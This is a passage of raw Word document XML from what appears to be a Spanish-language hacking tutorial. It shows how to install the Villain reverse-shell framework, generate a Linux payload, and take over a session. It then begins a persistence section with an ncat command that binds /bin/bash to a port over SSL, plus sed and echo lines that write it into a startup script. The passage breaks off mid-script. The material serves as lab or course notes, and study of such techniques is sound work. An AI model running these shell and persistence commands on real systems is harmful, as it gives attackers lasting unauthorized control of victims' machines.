    <w:p w14:paraId="372990A6" w14:textId="30ADCBB2" w:rsidR="003B7425" w:rsidRDefault="002935CB" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536DA3B9" wp14:editId="6183F4BF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="288" name="Imagen 28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descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C2B5B" w14:textId="4EC804AB" w:rsidR="007A3EFA" w:rsidRDefault="007A3EFA" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD85908" w14:textId="77777777" w:rsidR="007A3EFA" w:rsidRDefault="007A3EFA" w:rsidP="00856BA7"/>
    <w:p w14:paraId="79DB13B4" w14:textId="648FDBF2" w:rsidR="00643BCB" w:rsidRDefault="00643BCB" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF5C0FB" w14:textId="64326080" w:rsidR="00643BCB" w:rsidRDefault="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora usaremos Villain: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC9FA4" w14:textId="0C054532" w:rsidR="00856BA7" w:rsidRDefault="00000000" w:rsidP="00A11F34">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId295" w:history="1">
        <w:r w:rsidR="00A854B2" w:rsidRPr="0060171F">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/t3l3machus/Villain/blob/main/Usage_Guide.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="413C5645" w14:textId="77777777" w:rsidR="00A11F34" w:rsidRDefault="00A11F34" w:rsidP="00A11F34">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C406F01" w14:textId="0CE8243F" w:rsidR="00856BA7" w:rsidRPr="00A11F34" w:rsidRDefault="00856BA7" w:rsidP="00A11F34">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00856BA7">
        <w:t>Para instalarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149404BF" w14:textId="5C7823DF" w:rsidR="00856BA7" w:rsidRPr="008962EB" w:rsidRDefault="00856BA7" w:rsidP="00856BA7">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00771562">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId296" w:history="1">
        <w:r w:rsidRPr="00771562">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:color w:val="44546A" w:themeColor="text2"/>
          </w:rPr>
          <w:t>https://github.com/t3l3machus/Villain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00771562">
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D86CA2A" w14:textId="188B7848" w:rsidR="00856BA7" w:rsidRPr="008962EB" w:rsidRDefault="00856BA7" w:rsidP="00856BA7">
      <w:r w:rsidRPr="008962EB">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00771562">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>sudo chmod -R +777 ./Villain</w:t>
      </w:r>
      <w:r w:rsidR="00771562" w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07065845" w14:textId="29D7B33A" w:rsidR="00856BA7" w:rsidRPr="008962EB" w:rsidRDefault="00856BA7" w:rsidP="00856BA7">
      <w:r w:rsidRPr="008962EB">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00771562">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>cd ./Villain</w:t>
      </w:r>
      <w:r w:rsidR="00771562" w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19750C96" w14:textId="57E9AC2A" w:rsidR="00856BA7" w:rsidRDefault="00856BA7" w:rsidP="00856BA7">
      <w:r w:rsidRPr="008962EB">
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00A11F34">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00771562">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>pip3 install -r requirements.txt</w:t>
      </w:r>
      <w:r w:rsidR="00771562" w:rsidRPr="00771562">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A270056" w14:textId="504F84BE" w:rsidR="00856BA7" w:rsidRDefault="00856BA7" w:rsidP="00A11F34"/>
    <w:p w14:paraId="732DE660" w14:textId="604C65EF" w:rsidR="00A854B2" w:rsidRDefault="00A854B2" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estos son </w:t>
      </w:r>
      <w:r w:rsidR="00D03FB7">
        <w:t>los comandos para ejecutar</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2F670" w14:textId="331EC0B2" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD34AB3" w14:textId="6DE58D4A" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6A4F0A" w14:textId="1AC43311" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos el script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E818DBD" w14:textId="7E99F7AD" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00A53774">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BFA81F" wp14:editId="7170FD91">
            <wp:extent cx="5400040" cy="3203575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="293" name="Imagen 29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n 293" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3203575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882E645" w14:textId="73E7CCA5" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2BBFF" w14:textId="686C598A" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Escribiremos help generate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3F015" w14:textId="104D48E6" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00A53774">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC7C7E6" wp14:editId="0AACF9BE">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="294" name="Imagen 2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n 294" descr="Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF24889" w14:textId="0CD5BDB0" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDABD9C" w14:textId="7DA540BF" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos el comando para generar una shell en Linux, en lhost pondremos la IP de nuestra máquina o su interfaz de red:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23C105" w14:textId="77777777" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736F4F97" w14:textId="2FDEA63E" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00A53774">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CE1BCD" wp14:editId="594A036A">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="296" name="Imagen 29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n 296" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C7118" w14:textId="3029CBF9" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E82CA5A" w14:textId="11E6B061" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora copiaremos el paiload en el terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0946F0" w14:textId="30F34CE4" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D9894B" w14:textId="08084168" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="005E38D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372C14FE" wp14:editId="11410FCF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="297" name="Imagen 29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7" descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId300"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1F804" w14:textId="0F548500" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387F18C8" w14:textId="2CA16173" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Con esto generaremos una sesión, ahora escribiremos sessions, para ver las sesiones activas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462430AC" w14:textId="73C9DDA4" w:rsidR="005E38D6" w:rsidRDefault="005E38D6" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="005E38D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DE8A7EF" wp14:editId="2D5011DC">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="298" name="Imagen 29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descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2248C9AD" w14:textId="5773FA67" w:rsidR="005E38D6" w:rsidRDefault="00767024" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Y,</w:t>
      </w:r>
      <w:r w:rsidR="005E38D6">
        <w:t xml:space="preserve"> por último, copiaremos el ID de sesión y escribiremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4AB069" w14:textId="77777777" w:rsidR="00767024" w:rsidRDefault="00767024" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62522395" w14:textId="599F16B4" w:rsidR="00A53774" w:rsidRDefault="00767024" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00767024">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3B7333" wp14:editId="33337F15">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="299" name="Imagen 29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descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736DB92" w14:textId="1E924443" w:rsidR="00767024" w:rsidRDefault="00767024" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C51781B" w14:textId="14EEB134" w:rsidR="00767024" w:rsidRDefault="00767024" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con esto </w:t>
      </w:r>
      <w:r w:rsidR="00D03FB7">
        <w:t>conseguimos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> otra forma de conseguir la shell pero con una interfaz mejor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003FA8A" w14:textId="07B12706" w:rsidR="00A53774" w:rsidRDefault="00A53774" w:rsidP="00A11F34"/>
    <w:p w14:paraId="39A3E2CE" w14:textId="5F40CC28" w:rsidR="002E06D4" w:rsidRDefault="002E06D4" w:rsidP="00A854B2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E4F3C5" w14:textId="7009A718" w:rsidR="002E06D4" w:rsidRDefault="002E06D4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Persistencia -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C4199" w14:textId="77777777" w:rsidR="004816EB" w:rsidRDefault="004816EB" w:rsidP="004816EB"/>
    <w:p w14:paraId="2F2A1E5A" w14:textId="431F1072" w:rsidR="002E06D4" w:rsidRPr="004816EB" w:rsidRDefault="002E06D4" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="004816EB">
        <w:t xml:space="preserve">Una vez hacemos la Shell voy usar </w:t>
      </w:r>
      <w:r w:rsidR="005A33CE" w:rsidRPr="004816EB">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="004816EB">
        <w:t>ncat</w:t>
      </w:r>
      <w:r w:rsidR="005A33CE" w:rsidRPr="004816EB">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="004816EB">
        <w:t xml:space="preserve"> para crear una Shell persistente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54953D0F" w14:textId="368D07C6" w:rsidR="002E06D4" w:rsidRPr="004816EB" w:rsidRDefault="002E06D4" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="004816EB">
        <w:t>Para eso en la máquina tendría que crear este script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EE67E" w14:textId="77777777" w:rsidR="002E06D4" w:rsidRPr="004816EB" w:rsidRDefault="002E06D4" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8BA81D" w14:textId="447571A3" w:rsidR="002E06D4" w:rsidRPr="00857F50" w:rsidRDefault="002E06D4" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603BEBE" w14:textId="3FA6F414" w:rsidR="002E06D4" w:rsidRPr="00857F50" w:rsidRDefault="002E06D4" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>ncat -nlvp 192.168.1.148 8888 -e /bin/bash –ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10944B3F" w14:textId="241761CA" w:rsidR="007C33C7" w:rsidRPr="004816EB" w:rsidRDefault="007C33C7" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300F5B2D" w14:textId="4C7BB61C" w:rsidR="007C33C7" w:rsidRPr="00857F50" w:rsidRDefault="007C33C7" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i '1i #!/bin/bash' script.sh -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:tab/>
        <w:t>Para añadir la primera línea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410637CC" w14:textId="20DE1E7A" w:rsidR="007C33C7" w:rsidRPr="004816EB" w:rsidRDefault="007C33C7" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>sed -i '$a ncat -nlvp 192.168.1.148 8888 -e /bin/bash –ssl' script.sh -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004816EB">
        <w:t xml:space="preserve"> Para añadir la última línea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446CF986" w14:textId="5FDF29BC" w:rsidR="007C33C7" w:rsidRPr="004816EB" w:rsidRDefault="007C33C7" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DDFC1B" w14:textId="77777777" w:rsidR="00125DBA" w:rsidRPr="00857F50" w:rsidRDefault="00125DBA" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">O echo "#/bin/bash" &gt; script.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD84784" w14:textId="77777777" w:rsidR="00E92C5E" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Comprobar si Git está instalado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C7B7A" w14:textId="2DE6F2CE" w:rsidR="00E92C5E" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>if ! [ -x "$(command -v ncat)" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59E025" w14:textId="77777777" w:rsidR="00E92C5E" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
